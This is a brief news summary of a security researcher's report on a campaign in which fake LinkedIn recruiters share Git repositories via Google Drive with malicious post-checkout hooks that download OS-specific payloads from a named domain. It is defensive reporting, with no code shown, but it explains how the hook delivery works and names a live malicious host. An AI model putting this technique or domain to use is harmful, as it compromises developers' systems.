Malware Spreads Through Git Repositories Using Malicious Hooks
Original: Be careful with your Git: Investigating malware spreading through Git repositories
Why This Matters
Demonstrates new attack vector targeting developers through Git repositories
Security researcher discovers malware campaign using fake LinkedIn recruiters to distribute infected Git repositories via Google Drive. Attackers exploit Git hooks to execute malicious scripts when developers check out branches.
A security researcher received a LinkedIn message from a fake recruiter who directed them to download a codebase from Google Drive. The repository appeared legitimate but contained malicious Git hooks in the .git directory that executed when running git checkout commands. The post-checkout hook detected the operating system and downloaded payloads from nnlabs.pro/settings for Mac, Linux, or Windows systems. The attack bypassed normal Git security since hooks aren't transferred during cloning, but the Google Drive download included the complete .git folder with custom hook files. The malicious domain was hosted on Hostinger and remained active at publication time.